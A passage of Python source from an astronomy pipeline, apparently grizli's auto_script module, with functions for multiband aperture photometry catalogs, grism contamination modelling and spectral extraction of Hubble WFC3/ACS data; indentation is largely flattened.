ok &= np.abs(xp[:, 0] - xy[i, 0]) > minR
mask[xp[ok, 1]+j, xp[ok, 0]] = 1
im['DQ', ext].data |= mask*dq_bit
im.flush()
def multiband_catalog(field_root='j142724+334246', threshold=1.8, detection_background=True, photometry_background=True, get_all_filters=False, filters=None, det_err_scale=-np.inf, phot_err_scale=-np.inf, rescale_weight=True, run_detection=True, detection_filter='ir', detection_root=None, output_root=None, use_psf_filter=True, detection_params=prep.SEP_DETECT_PARAMS, phot_apertures=prep.SEXTRACTOR_PHOT_APERTURES_ARCSEC, master_catalog=None, bkg_mask=None, bkg_params={'bw': 64, 'bh': 64, 'fw': 3, 'fh': 3, 'pixel_scale': 0.06}, use_bkg_err=False, aper_segmask=True):
"""
Make a detection catalog and run aperture photometry with the
SExtractor clone `~sep`.
    `phot_apertures` are aperture *diameters*. If provided as a string, the
    apertures are assumed to be in pixel units. A list of elements with
    `astropy.units` attributes can also be provided; these are converted to
    pixels using the image WCS / pixel size.
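    Examples
    --------
    A hedged sketch, run in the directory containing the drizzled mosaics of
    a hypothetical field; writes ``{output_root}_phot.fits`` and returns the
    photometric table:
    >>> tab = auto_script.multiband_catalog(field_root='j142724+334246',
    ...                                     detection_filter='ir',
    ...                                     threshold=1.8)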
"""
try:
from .. import prep, utils
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.multiband_catalog')
except:
from grizli import prep, utils
# Make catalog
if master_catalog is None:
master_catalog = '{0}-{1}.cat.fits'.format(field_root, detection_filter)
else:
if not os.path.exists(master_catalog):
print('Master catalog {0} not found'.format(master_catalog))
return False
if not os.path.exists(master_catalog):
run_detection = True
if detection_root is None:
detection_root = '{0}-{1}'.format(field_root, detection_filter)
if output_root is None:
output_root = field_root
if run_detection:
if use_psf_filter:
psf_files = glob.glob('{0}*psf.fits'.format(field_root))
if len(psf_files) > 0:
psf_files.sort()
psf_im = pyfits.open(psf_files[-1])
msg = '# Generate PSF kernel from {0}\n'.format(psf_files[-1])
utils.log_comment(utils.LOGFILE, msg, verbose=True)
sh = psf_im['PSF', 'DRIZ1'].data.shape
# Cut out center of PSF
skip = (sh[0]-1-11)//2
psf = psf_im['PSF', 'DRIZ1'].data[skip:-1-skip, skip:-1-skip]*1
# Optimal filter is reversed PSF (i.e., PSF cross-correlation)
# https://arxiv.org/pdf/1512.06872.pdf
psf_kernel = psf[::-1, :][:, ::-1]
psf_kernel /= psf_kernel.sum()
detection_params['filter_kernel'] = psf_kernel
tab = prep.make_SEP_catalog(root=detection_root, threshold=threshold, get_background=detection_background, save_to_fits=True, rescale_weight=rescale_weight, err_scale=det_err_scale, phot_apertures=phot_apertures, detection_params=detection_params, bkg_mask=bkg_mask, bkg_params=bkg_params, use_bkg_err=use_bkg_err, aper_segmask=aper_segmask)
cat_pixel_scale = tab.meta['asec_0'][0]/tab.meta['aper_0'][0]
else:
tab = utils.GTable.gread(master_catalog)
cat_pixel_scale = tab.meta['ASEC_0']/tab.meta['APER_0']
# Source positions
#source_xy = tab['X_IMAGE'], tab['Y_IMAGE']
if aper_segmask:
seg_data = pyfits.open('{0}_seg.fits'.format(detection_root))[0].data
seg_data = np.cast[np.int32](seg_data)
aseg, aseg_id = seg_data, tab['NUMBER']
source_xy = tab['X_WORLD'], tab['Y_WORLD'], aseg, aseg_id
aseg_half = None
else:
source_xy = tab['X_WORLD'], tab['Y_WORLD']
if filters is None:
visits_file = '{0}_visits.npy'.format(field_root)
if not os.path.exists(visits_file):
get_all_filters = True
if get_all_filters:
mq = '{0}-f*dr?_sci.fits*'
mq = mq.format(field_root.replace('-100mas','-*mas'))
mosaic_files = glob.glob(mq)
mosaic_files.sort()
filters = [file.split('_')[-3][len(field_root)+1:]
for file in mosaic_files]
else:
vfile = '{0}_visits.npy'.format(field_root)
visits, all_groups, info = np.load(vfile, allow_pickle=True)
if ONLY_F814W:
info = info[((info['INSTRUME'] == 'WFC3') &
(info['DETECTOR'] == 'IR')) |
(info['FILTER'] == 'F814W')]
# UVIS
info_filters = [f for f in info['FILTER']]
for i in range(len(info)):
file_i = info['FILE'][i]
if file_i.startswith('i') & ('_flc' in file_i):
info_filters[i] += 'U'
info['FILTER'] = info_filters
filters = [f.lower() for f in np.unique(info['FILTER'])]
#filters.insert(0, 'ir')
#segment_img = pyfits.open('{0}-ir_seg.fits'.format(field_root))[0].data
fq = '{0}-{1}_dr?_sci.fits*'
for ii, filt in enumerate(filters):
print(filt)
if filt.startswith('g'):
continue
if filt not in ['g102', 'g141', 'g800l']:
sci_files = glob.glob(fq.format(field_root.replace('-100mas','-*mas'),
filt))
if len(sci_files) == 0:
continue
root = sci_files[0].split('{0}_dr'.format(filt))[0]+filt
# root = '{0}-{1}'.format(field_root, filt)
# Check for half-pixel optical images if using segmask
if aper_segmask:
sci = pyfits.open(sci_files[0])
sci_shape = sci[0].data.shape
sci.close()
del(sci)
if sci_shape[0] != aseg.shape[0]:
print('# filt={0}, need half-size segmentation image!'.format(filt), sci_shape, aseg.shape)
if aseg_half is None:
aseg_half = np.zeros(sci_shape, dtype=aseg.dtype)
for i in [0, 1]:
for j in [0, 1]:
aseg_half[i::2, j::2] += aseg
source_xy = tab['X_WORLD'], tab['Y_WORLD'], aseg_half, aseg_id
else:
source_xy = tab['X_WORLD'], tab['Y_WORLD'], aseg, aseg_id
filter_tab = prep.make_SEP_catalog(root=root,
threshold=threshold,
rescale_weight=rescale_weight,
err_scale=phot_err_scale,
get_background=photometry_background,
save_to_fits=False, source_xy=source_xy,
phot_apertures=phot_apertures, bkg_mask=bkg_mask,
bkg_params=bkg_params, use_bkg_err=use_bkg_err)
for k in filter_tab.meta:
newk = '{0}_{1}'.format(filt.upper(), k)
tab.meta[newk] = filter_tab.meta[k]
for c in filter_tab.colnames:
newc = '{0}_{1}'.format(filt.upper(), c)
tab[newc] = filter_tab[c]
# Kron total correction from EE
filt_plam = tab.meta['{0}_PLAM'.format(filt.upper())]
tot_corr = prep.get_kron_tot_corr(tab, filt.lower(),
pixel_scale=cat_pixel_scale,
photplam=filt_plam)
#ee_corr = prep.get_kron_tot_corr(tab, filter=filt.lower())
tab['{0}_tot_corr'.format(filt.upper())] = tot_corr
else:
continue
for c in tab.colnames:
tab.rename_column(c, c.lower())
idcol = utils.GTable.Column(data=tab['number'], name='id')
tab.add_column(idcol, index=0)
tab.write('{0}_phot.fits'.format(output_root), format='fits', overwrite=True)
return tab
def count_grism_exposures(phot, groups, grisms=['g800l', 'g102', 'g141'], reset=True, verbose=False):
"""
Count number of grism exposures that contain objects in a catalog
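    A minimal sketch: ``phot`` is the table from `multiband_catalog` and
    ``groups`` the grism association list from `parse_visits`:
    >>> phot = count_grism_exposures(phot, all_groups,
    ...                              grisms=['g800l', 'g102', 'g141'])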
"""
from matplotlib.path import Path
points = np.array([phot['ra'], phot['dec']]).T
for g in grisms:
if ('nexp_'+g not in phot.colnames) | reset:
phot['nexp_'+g] = np.zeros(len(phot), dtype=np.int32)
for ig, g in enumerate(groups):
gri = g['grism']['product'].split('-')[-1]
if gri not in grisms:
continue
if verbose:
print('{0:<4} {1:48} {2}'.format(ig, g['grism']['product'], gri))
for fp in g['grism']['footprints']:
hull = Path(np.array(fp.convex_hull.boundary.xy).T)
phot['nexp_'+gri] += hull.contains_points(points)*1
phot['has_grism'] = (phot['nexp_'+grisms[0]] > 0).astype(np.uint8)
if len(grisms) > 1:
for ig, g in enumerate(grisms):
phot['has_grism'] |= (phot['nexp_'+g] > 0).astype(np.uint8)*2**ig
phot.meta[g+'bit'] = 2**ig
return phot
def photutils_catalog(field_root='j142724+334246', threshold=1.8, subtract_bkg=True):
"""
Make a detection catalog with SExtractor and then measure
photometry with `~photutils`.
"""
from photutils import segmentation, background
import photutils.utils
import warnings
warnings.warn('photutils_catalog is deprecated, use ``sep`` catalog '
'in multiband_catalog')
try:
from .. import prep, utils
except:
from grizli import prep, utils
# Photutils catalog
#overlaps = np.load('{0}_overlaps.npy'.format(field_root))[0]
# Make catalog
sexcat = prep.make_drz_catalog(root='{0}-ir'.format(field_root), threshold=threshold, extra_config=prep.SEXTRACTOR_CONFIG_3DHST)
#sexcat = prep.make_SEP_catalog(root='{0}-ir'.format(field_root), threshold=threshold, extra_config=prep.SEXTRACTOR_CONFIG_3DHST)
for c in sexcat.colnames:
sexcat.rename_column(c, c.lower())
sexcat = sexcat['number', 'mag_auto', 'flux_radius']
files = glob.glob('../RAW/*fl[tc].fits')
info = utils.get_flt_info(files)
if ONLY_F814W:
info = info[((info['INSTRUME'] == 'WFC3') & (info['DETECTOR'] == 'IR')) | (info['FILTER'] == 'F814W')]
filters = [f.lower() for f in np.unique(info['FILTER'])]
filters.insert(0, 'ir')
segment_img = pyfits.open('{0}-ir_seg.fits'.format(field_root))[0].data
for ii, filt in enumerate(filters):
print(filt)
if filt.startswith('g'):
continue
if filt not in ['g102', 'g141']:
sci_files = glob.glob(('{0}-{1}_dr?_sci.fits'.format(field_root, filt)))
if len(sci_files) == 0:
continue
else:
sci_file = sci_files[0]
sci = pyfits.open(sci_file)
wht = pyfits.open(sci_file.replace('_sci', '_wht'))
else:
continue
photflam = sci[0].header['PHOTFLAM']
ABZP = (-2.5*np.log10(sci[0].header['PHOTFLAM']) - 21.10 -
5*np.log10(sci[0].header['PHOTPLAM']) + 18.6921)
bkg_err = 1/np.sqrt(wht[0].data)
bkg_err[~np.isfinite(bkg_err)] = 0 # 1e30
total_error = photutils.utils.calc_total_error(sci[0].data, bkg_err, sci[0].header['EXPTIME'])
wht_mask = (wht[0].data == 0) | (sci[0].data == 0)
sci[0].data[wht[0].data == 0] = 0
mask = None # bkg_err > 1.e29
ok = wht[0].data > 0
if ok.sum() == 0:
print(' No valid pixels')
continue
if subtract_bkg:
try:
bkg = background.Background2D(sci[0].data, 100, mask=wht_mask | (segment_img > 0), filter_size=(3, 3), filter_threshold=None, edge_method='pad')
bkg_obj = bkg.background
except:
bkg_obj = None
utils.log_exception(utils.LOGFILE, traceback)
utils.log_comment(utils.LOGFILE, "# !! Couldn't make bkg_obj")
else:
bkg_obj = None
cat = segmentation.source_properties(sci[0].data, segment_img, error=total_error, mask=mask, background=bkg_obj, filter_kernel=None, wcs=pywcs.WCS(sci[0].header), labels=None)
if filt == 'ir':
cols = ['id', 'xcentroid', 'ycentroid', 'sky_centroid', 'sky_centroid_icrs', 'source_sum', 'source_sum_err', 'xmin', 'xmax', 'ymin', 'ymax', 'min_value', 'max_value', 'minval_xpos', 'minval_ypos', 'maxval_xpos', 'maxval_ypos', 'area', 'equivalent_radius', 'perimeter', 'semimajor_axis_sigma', 'semiminor_axis_sigma', 'eccentricity', 'orientation', 'ellipticity', 'elongation', 'covar_sigx2', 'covar_sigxy', 'covar_sigy2', 'cxx', 'cxy', 'cyy']
tab = utils.GTable(cat.to_table(columns=cols))
cols = ['source_sum', 'source_sum_err']
for c in cols:
tab[c.replace('sum', 'flam')] = tab[c]*photflam
else:
cols = ['source_sum', 'source_sum_err']
t_i = cat.to_table(columns=cols)
mask = (np.isfinite(t_i['source_sum_err']))
for c in cols:
tab['{0}_{1}'.format(filt, c)] = t_i[c]
tab['{0}_{1}'.format(filt, c)][~mask] = np.nan
cflam = c.replace('sum', 'flam')
tab['{0}_{1}'.format(filt, cflam)] = t_i[c]*photflam
tab['{0}_{1}'.format(filt, cflam)][~mask] = np.nan
tab.meta['PW{0}'.format(filt.upper())] = sci[0].header['PHOTPLAM']
tab.meta['ZP{0}'.format(filt.upper())] = ABZP
tab.meta['FL{0}'.format(filt.upper())] = sci[0].header['PHOTFLAM']
icrs = [(coo.ra.value, coo.dec.value) for coo in tab['sky_centroid_icrs']]
tab['ra'] = [coo[0] for coo in icrs]
tab['dec'] = [coo[1] for coo in icrs]
tab.remove_column('sky_centroid_icrs')
tab.remove_column('sky_centroid')
tab.write('{0}_phot.fits'.format(field_root), format='fits', overwrite=True)
return tab
def load_GroupFLT(field_root='j142724+334246', PREP_PATH='../Prep', force_ref=None, force_seg=None, force_cat=None, galfit=False, pad=256, files=None, gris_ref_filters=GRIS_REF_FILTERS, split_by_grism=False):
"""
Initialize a GroupFLT object
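    A hedged sketch for a hypothetical field with processed exposures in
    ``../Prep``; returns a list of `multifit.GroupFLT` objects (one per
    grism when ``split_by_grism=True``):
    >>> grps = load_GroupFLT(field_root='j142724+334246', PREP_PATH='../Prep',
    ...                      split_by_grism=True)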
"""
import glob
import os
import numpy as np
from .. import prep, utils, multifit
if files is None:
files = glob.glob(os.path.join(PREP_PATH, '*fl[tc].fits'))
files.sort()
info = utils.get_flt_info(files)
g141 = info['FILTER'] == 'G141'
g102 = info['FILTER'] == 'G102'
g800l = info['FILTER'] == 'G800L'
if force_cat is None:
#catalog = '{0}-ir.cat.fits'.format(field_root)
catalog = glob.glob('{0}-ir.cat.fits'.format(field_root))[0]
else:
catalog = force_cat
grp_objects = []
#grp = None
if (g141.sum() > 0) & ('G141' in gris_ref_filters):
for f in gris_ref_filters['G141']:
if os.path.exists(f'{field_root}-{f.lower()}_drz_sci.fits'):
g141_ref = f
break
# Segmentation image
if force_seg is None:
if galfit == 'clean':
seg_file = '{0}-{1}_galfit_orig_seg.fits'.format(field_root, g141_ref.lower())
elif galfit == 'model':
seg_file = '{0}-{1}_galfit_seg.fits'.format(field_root, g141_ref.lower())
else:
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
#seg_file = '{0}-ir_seg.fits'.format(field_root)
else:
seg_file = force_seg
# Reference image
if force_ref is None:
if galfit == 'clean':
ref_file = '{0}-{1}_galfit_clean.fits'.format(field_root, g141_ref.lower())
elif galfit == 'model':
ref_file = '{0}-{1}_galfit.fits'.format(field_root, g141_ref.lower())
else:
ref_file = '{0}-{1}_drz_sci.fits'.format(field_root, g141_ref.lower())
else:
ref_file = force_ref
grp = multifit.GroupFLT(grism_files=list(info['FILE'][g141]), direct_files=[], ref_file=ref_file, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=pad)
grp_objects.append(grp)
if (g102.sum() > 0) & ('G102' in gris_ref_filters):
for f in gris_ref_filters['G102']:
if os.path.exists('{0}-{1}_drz_sci.fits'.format(field_root, f.lower())):
g102_ref = f
break
# Segmentation image
if force_seg is None:
if galfit == 'clean':
seg_file = '{0}-{1}_galfit_orig_seg.fits'.format(field_root, g102_ref.lower())
elif galfit == 'model':
seg_file = '{0}-{1}_galfit_seg.fits'.format(field_root, g102_ref.lower())
else:
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
else:
seg_file = force_seg
# Reference image
if force_ref is None:
if galfit == 'clean':
ref_file = '{0}-{1}_galfit_clean.fits'.format(field_root, g102_ref.lower())
elif galfit == 'model':
ref_file = '{0}-{1}_galfit.fits'.format(field_root, g102_ref.lower())
else:
ref_file = '{0}-{1}_drz_sci.fits'.format(field_root, g102_ref.lower())
else:
ref_file = force_ref
grp_i = multifit.GroupFLT(grism_files=list(info['FILE'][g102]), direct_files=[], ref_file=ref_file, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=pad)
# if g141.sum() > 0:
# grp.extend(grp_i)
# else:
# grp = grp_i
grp_objects.append(grp_i)
# del(grp_i)
# ACS
if (g800l.sum() > 0) & ('G800L' in gris_ref_filters):
acs_grp = None
for f in gris_ref_filters['G800L']:
if os.path.exists('{0}-{1}_drc_sci.fits'.format(field_root, f.lower())):
g800l_ref = f
break
# Segmentation image
if force_seg is None:
if galfit == 'clean':
seg_file = '{0}-{1}_galfit_orig_seg.fits'.format(field_root, g800l_ref.lower())
elif galfit == 'model':
seg_file = '{0}-{1}_galfit_seg.fits'.format(field_root, g800l_ref.lower())
else:
#seg_file = '{0}-ir_seg.fits'.format(field_root)
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
else:
seg_file = force_seg
# Reference image
if force_ref is None:
if galfit == 'clean':
ref_file = '{0}-{1}_galfit_clean.fits'.format(field_root, g800l_ref.lower())
elif galfit == 'model':
ref_file = '{0}-{1}_galfit.fits'.format(field_root, g800l_ref.lower())
else:
ref_file = '{0}-{1}_drc_sci.fits'.format(field_root, g800l_ref.lower())
else:
ref_file = force_ref
for sci_extn in [1, 2]:
grp_i = multifit.GroupFLT(grism_files=list(info['FILE'][g800l]), direct_files=[], ref_file=ref_file, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=sci_extn, pad=0, shrink_segimage=False)
if acs_grp is not None:
acs_grp.extend(grp_i)
del(grp_i)
else:
acs_grp = grp_i
if acs_grp is not None:
grp_objects.append(acs_grp)
if split_by_grism:
return grp_objects
else:
        # Concatenate all grism groups into a single GroupFLT object;
        # iterate over a slice so the list isn't modified mid-loop
        grp = grp_objects[0]
        for grp_i in grp_objects[1:]:
            grp.extend(grp_i)
return [grp]
def grism_prep(field_root='j142724+334246', PREP_PATH='../Prep', EXTRACT_PATH='../Extractions', ds9=None, refine_niter=3, gris_ref_filters=GRIS_REF_FILTERS, files=None, split_by_grism=True, refine_poly_order=1, refine_fcontam=0.5, cpu_count=0, mask_mosaic_edges=True, prelim_mag_limit=25, refine_mag_limits=[18, 24], grisms_to_process=None):
"""
Contamination model for grism exposures
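    A hedged sketch for a hypothetical field, run from the Prep directory;
    the contamination models are saved and minimal products are linked into
    ``EXTRACT_PATH``:
    >>> grp = auto_script.grism_prep(field_root='j142724+334246',
    ...                              refine_niter=3, cpu_count=0)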
"""
import glob
import os
import numpy as np
import scipy.stats
try:
from .. import prep, utils, multifit
frame = inspect.currentframe()
utils.log_function_arguments(utils.LOGFILE, frame,
'auto_script.grism_prep')
except:
from grizli import prep, utils, multifit
if grisms_to_process is not None:
for g in gris_ref_filters.copy():
if g not in grisms_to_process:
pg = gris_ref_filters.pop(g)
grp_objects = load_GroupFLT(field_root=field_root, PREP_PATH=PREP_PATH,
gris_ref_filters=gris_ref_filters,
files=files, split_by_grism=split_by_grism)
for grp in grp_objects:
################
# Compute preliminary model
grp.compute_full_model(fit_info=None, verbose=True, store=False,
mag_limit=prelim_mag_limit, coeffs=[1.1, -0.5],
cpu_count=cpu_count)
##############
# Save model to avoid having to recompute it again
grp.save_full_data()
#############
# Mask edges of the exposures not covered by reference image
if mask_mosaic_edges:
try:
                # Read the footprint file created earlier
fp_file = '{0}-ir.npy'.format(field_root)
det_poly = np.load(fp_file, allow_pickle=True)[0]['footprint']
for flt in grp.FLTs:
flt.mask_mosaic_edges(sky_poly=det_poly, verbose=True,
dq_mask=False, dq_value=1024,
err_scale=10, resid_sn=-1)
except:
pass
################
# Remove constant modal background
for i in range(grp.N):
mask = (grp.FLTs[i].model < grp.FLTs[i].grism['ERR']*0.6)
mask &= (grp.FLTs[i].grism['SCI'] != 0)
# Fit Gaussian to the masked pixel distribution
clip = np.ones(mask.sum(), dtype=bool)
for iter in range(3):
clip_data = grp.FLTs[i].grism.data['SCI'][mask][clip]
n = scipy.stats.norm.fit(clip_data)
clip = np.abs(grp.FLTs[i].grism.data['SCI'][mask]) < 3*n[1]
del(clip_data)
mode = n[0]
logstr = '# grism_mode_bg {0} {1} {2:.4f}'
logstr = logstr.format(grp.FLTs[i].grism.parent_file,
grp.FLTs[i].grism.filter, mode)
utils.log_comment(utils.LOGFILE, logstr, verbose=True)
try:
ds9.view(grp.FLTs[i].grism['SCI'] - grp.FLTs[i].model)
except:
pass
# Subtract
grp.FLTs[i].grism.data['SCI'] -= mode
#############
# Refine the model
i = 0
if ds9:
ds9.view(grp.FLTs[i].grism['SCI'] - grp.FLTs[i].model)
fr = ds9.get('frame')
utils.log_comment(utils.LOGFILE, '# Refine contamination',
verbose=True, show_date=True)
for iter in range(refine_niter):
print('\nRefine contamination model, iter # {0}\n'.format(iter))
if ds9:
ds9.set('frame {0}'.format(int(fr)+iter+1))
if (iter == 0) & (refine_niter > 0):
refine_i = 1
else:
refine_i = refine_fcontam
grp.refine_list(poly_order=refine_poly_order,
mag_limits=refine_mag_limits,
max_coeff=5, ds9=ds9, verbose=True,
fcontam=refine_i)
##############
# Save model to avoid having to recompute it again
grp.save_full_data()
# Link minimal files to Extractions directory
os.chdir(EXTRACT_PATH)
os.system(f'ln -s {PREP_PATH}/*GrismFLT* .')
os.system(f'ln -s {PREP_PATH}/*_fl*wcs.fits .')
os.system(f'ln -s {PREP_PATH}/{field_root}-*.cat.fits .')
os.system(f'ln -s {PREP_PATH}/{field_root}-*seg.fits .')
os.system(f'ln -s {PREP_PATH}/*_phot.fits .')
return grp
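# Default drizzle parameters ("pline") for the 2D emission-line maps: a point
# kernel with small pixfrac for dithered observations and a square kernel
# with pixfrac=1 for undithered parallel fields. Used as defaults in
# `extract` and `generate_fit_params`.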
DITHERED_PLINE = {'kernel': 'point', 'pixfrac': 0.2, 'pixscale': 0.1, 'size': 8, 'wcs': None}
PARALLEL_PLINE = {'kernel': 'square', 'pixfrac': 1.0, 'pixscale': 0.1, 'size': 8, 'wcs': None}
def refine_model_with_fits(field_root='j142724+334246', grp=None, master_files=None, spectrum='continuum', clean=True, max_chinu=5):
"""
Refine the full-field grism models with the best fit spectra from
individual extractions.
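    A hedged sketch, run in the Extractions directory where the
    ``*full.fits`` fit products and ``*GrismFLT.fits`` models live:
    >>> refine_model_with_fits(field_root='j142724+334246',
    ...                        spectrum='continuum', max_chinu=5)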
"""
import glob
import traceback
try:
from .. import multifit
except:
from grizli import multifit
if grp is None:
if master_files is None:
master_files = glob.glob('*GrismFLT.fits')
master_files.sort()
catalog = glob.glob(f'{field_root}-*.cat.fits')[0]
try:
seg_file = glob.glob(f'{field_root}-*_seg.fits')[0]
except:
seg_file = None
grp = multifit.GroupFLT(grism_files=master_files, direct_files=[], ref_file=None, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=256)
fit_files = glob.glob('*full.fits')
fit_files.sort()
N = len(fit_files)
if N == 0:
return False
msg = 'Refine model ({0}/{1}): {2} / skip (chinu={3:.1f}, dof={4})'
for i, file in enumerate(fit_files):
try:
hdu = pyfits.open(file)
id = hdu[0].header['ID']
fith = hdu['ZFIT_STACK'].header
chinu = fith['CHIMIN']/fith['DOF']
if (chinu > max_chinu) | (fith['DOF'] < 10):
print(msg.format(i, N, file, chinu, fith['DOF']))
continue
sp = utils.GTable(hdu['TEMPL'].data)
            dt = float
wave = np.cast[dt](sp['wave']) # .byteswap()
flux = np.cast[dt](sp[spectrum]) # .byteswap()
grp.compute_single_model(int(id), mag=19, size=-1, store=False,
spectrum_1d=[wave, flux], is_cgs=True,
get_beams=None, in_place=True)
print('Refine model ({0}/{1}): {2}'.format(i, N, file))
except:
print('Refine model ({0}/{1}): {2} / failed'.format(i, N, file))
grp.save_full_data()
if clean:
print('# refine_model_with_fits: cleanup')
files = glob.glob('*_grism_*fits')
files += glob.glob('*beams.fits')
files += glob.glob('*stack.fits')
files += glob.glob('*stack.png')
files += glob.glob('*full.fits')
for file in files:
os.remove(file)
del(grp)
def extract(field_root='j142724+334246', maglim=[13, 24], prior=None, MW_EBV=0.00, ids=[], pline=DITHERED_PLINE, fit_only_beams=True, run_fit=True, poly_order=7, oned_R=30, master_files=None, grp=None, bad_pa_threshold=None, fit_trace_shift=False, size=32, diff=True, min_sens=0.02, fcontam=0.2, min_mask=0.01, sys_err=0.03, skip_complete=True, fit_args={}, args_file='fit_args.npy', get_only_beams=False):
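    """
    Extract stacked 2D and 1D grism spectra for objects in the detection
    catalog, optionally running the redshift fits.
    A hedged usage sketch, run from the Extractions directory of a
    hypothetical field with the ``*GrismFLT.fits`` models present:
    >>> auto_script.extract(field_root='j142724+334246', maglim=[17, 23],
    ...                     run_fit=False)
    """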
import glob
import os
import numpy as np
import matplotlib.pyplot as plt
#import grizli
try:
from .. import multifit, prep, utils, fitting
except:
from grizli import multifit, prep, utils, fitting
if master_files is None:
master_files = glob.glob('*GrismFLT.fits')
master_files.sort()
if grp is None:
init_grp = True
catalog = glob.glob('{0}-*.cat.fits'.format(field_root))[0]
try:
seg_file = glob.glob('{0}-*_seg.fits'.format(field_root))[0]
except:
seg_file = None
grp = multifit.GroupFLT(grism_files=master_files, direct_files=[], ref_file=None, seg_file=seg_file, catalog=catalog, cpu_count=-1, sci_extn=1, pad=256)
else:
init_grp = False
###############
    # Photometry
target = field_root
try:
file_args = np.load(args_file, allow_pickle=True)[0]
MW_EBV = file_args['MW_EBV']
min_sens = file_args['min_sens']
min_mask = file_args['min_mask']
fcontam = file_args['fcontam']
sys_err = file_args['sys_err']
pline = file_args['pline']
fit_args = file_args
fit_args.pop('kwargs')
except:
pass
if get_only_beams:
beams = grp.get_beams(ids, size=size, beam_id='A', min_sens=min_sens)
if init_grp:
del(grp)
return(beams)
###########
# IDs to extract
# ids=[1096]
if ids == []:
clip = (grp.catalog['MAG_AUTO'] > maglim[0]) & (grp.catalog['MAG_AUTO'] < maglim[1])
so = np.argsort(grp.catalog['MAG_AUTO'][clip])
ids = grp.catalog['NUMBER'][clip][so]
else:
ids = [int(id) for id in ids]
    # Stack the different beams
# Use "binning" templates for standardized extraction
if oned_R:
bin_steps, step_templ = utils.step_templates(wlim=[5000, 18000.0],
R=oned_R, round=10)
init_templates = step_templ
else:
# Polynomial templates
wave = np.linspace(2000, 2.5e4, 100)
poly_templ = utils.polynomial_templates(wave, order=poly_order)
init_templates = poly_templ
#size = 32
close = True
show_beams = True
if __name__ == '__main__': # Interactive
size = 32
close = Skip = False
pline = {'kernel': 'point', 'pixfrac': 0.2, 'pixscale': 0.1, 'size': 8, 'wcs': None}
prior = None
skip_complete = True
fit_trace_shift = False
bad_pa_threshold = 1.6
MW_EBV = 0
###############
# Stacked spectra
for ii, id in enumerate(ids):
if skip_complete:
if os.path.exists('{0}_{1:05d}.stack.png'.format(target, id)):
continue
beams = grp.get_beams(id, size=size, beam_id='A', min_sens=min_sens)
for i in range(len(beams))[::-1]:
if beams[i].fit_mask.sum() < 10:
beams.pop(i)
print('{0}/{1}: {2} {3}'.format(ii, len(ids), id, len(beams)))
if len(beams) < 1:
continue
#mb = multifit.MultiBeam(beams, fcontam=fcontam, group_name=target, psf=False, MW_EBV=MW_EBV, min_sens=min_sens)
mb = multifit.MultiBeam(beams, fcontam=fcontam, group_name=target, psf=False, MW_EBV=MW_EBV, sys_err=sys_err, min_mask=min_mask, min_sens=min_sens)
if bad_pa_threshold is not None:
out = mb.check_for_bad_PAs(chi2_threshold=bad_pa_threshold,
poly_order=1, reinit=True,
fit_background=True)
fit_log, keep_dict, has_bad = out
if has_bad:
print('\n Has bad PA! Final list: {0}\n{1}'.format(keep_dict, fit_log))
ixi = grp.catalog['NUMBER'] == id
if (fit_trace_shift > 0) & (grp.catalog['MAG_AUTO'][ixi][0] < 24.5):
b = mb.beams[0]
b.compute_model()
sn_lim = fit_trace_shift*1
if (np.max((b.model/b.grism['ERR'])[b.fit_mask.reshape(b.sh)]) > sn_lim) | (sn_lim > 100):
print(' Fit trace shift: \n')
try:
shift = mb.fit_trace_shift(tol=1.e-3, verbose=True, split_groups=True, lm=True)
except:
pass
try:
tfit = mb.template_at_z(z=0, templates=init_templates, fit_background=True, fitter='lstsq', get_uncertainties=2)
except:
tfit = None
try:
fig1 = mb.oned_figure(figsize=[5, 3], tfit=tfit, show_beams=show_beams, scale_on_stacked=True, ylim_percentile=5)
if oned_R:
outroot = '{0}_{1:05d}.R{2:.0f}'.format(target, id, oned_R)
hdu = mb.oned_spectrum_to_hdu(outputfile=outroot+'.fits',
tfit=tfit, wave=bin_steps)
else:
outroot = '{0}_{1:05d}.1D'.format(target, id)
hdu = mb.oned_spectrum_to_hdu(outputfile=outroot+'.fits',
tfit=tfit)
fig1.savefig(outroot+'.png')
except:
continue
hdu, fig = mb.drizzle_grisms_and_PAs(fcontam=0.5, flambda=False, kernel='point', size=32, tfit=tfit, diff=diff)
fig.savefig('{0}_{1:05d}.stack.png'.format(target, id))
hdu.writeto('{0}_{1:05d}.stack.fits'.format(target, id),
overwrite=True)
mb.write_master_fits()
if False:
# Fit here for AWS...
fitting.run_all_parallel(id, verbose=True)
if close:
plt.close(fig)
plt.close(fig1)
del(hdu)
del(mb)
for k in range(100000):
plt.close()
if not run_fit:
if init_grp:
return grp
else:
return True
for ii, id in enumerate(ids):
print('{0}/{1}: {2}'.format(ii, len(ids), id))
if not os.path.exists('{0}_{1:05d}.beams.fits'.format(target, id)):
continue
if skip_complete:
if os.path.exists('{0}_{1:05d}.line.png'.format(target, id)):
continue
try:
out = fitting.run_all_parallel(id, get_output_data=True, **fit_args, args_file=args_file)
mb, st, fit, tfit, line_hdu = out
spectrum_1d = [tfit['cont1d'].wave, tfit['cont1d'].flux]
grp.compute_single_model(id, mag=-99, size=-1, store=False, spectrum_1d=spectrum_1d, get_beams=None, in_place=True, is_cgs=True)
if close:
for k in range(1000):
plt.close()
del(out)
except:
pass
# Re-save data with updated models
if init_grp:
grp.save_full_data()
return grp
else:
return True
def generate_fit_params(field_root='j142724+334246', fitter=['nnls', 'bounded'], prior=None, MW_EBV=0.00, pline=DITHERED_PLINE, fit_only_beams=True, run_fit=True, poly_order=7, fsps=True, min_sens=0.01, sys_err=0.03, fcontam=0.2, zr=[0.05, 3.6], dz=[0.004, 0.0004], fwhm=1000, lorentz=False, include_photometry=True, use_phot_obj=False, save_file='fit_args.npy', fit_trace_shift=False, **kwargs):
"""
Generate a parameter dictionary for passing to the fitting script
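    A minimal sketch (hypothetical field); the argument dictionary is saved
    to ``save_file`` and read back by `extract` and
    `fitting.run_all_parallel`:
    >>> args = auto_script.generate_fit_params(field_root='j142724+334246',
    ...                                        zr=[0.05, 3.4],
    ...                                        save_file='fit_args.npy')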
"""
import numpy as np
from grizli import utils, fitting
from . import photoz
phot = None
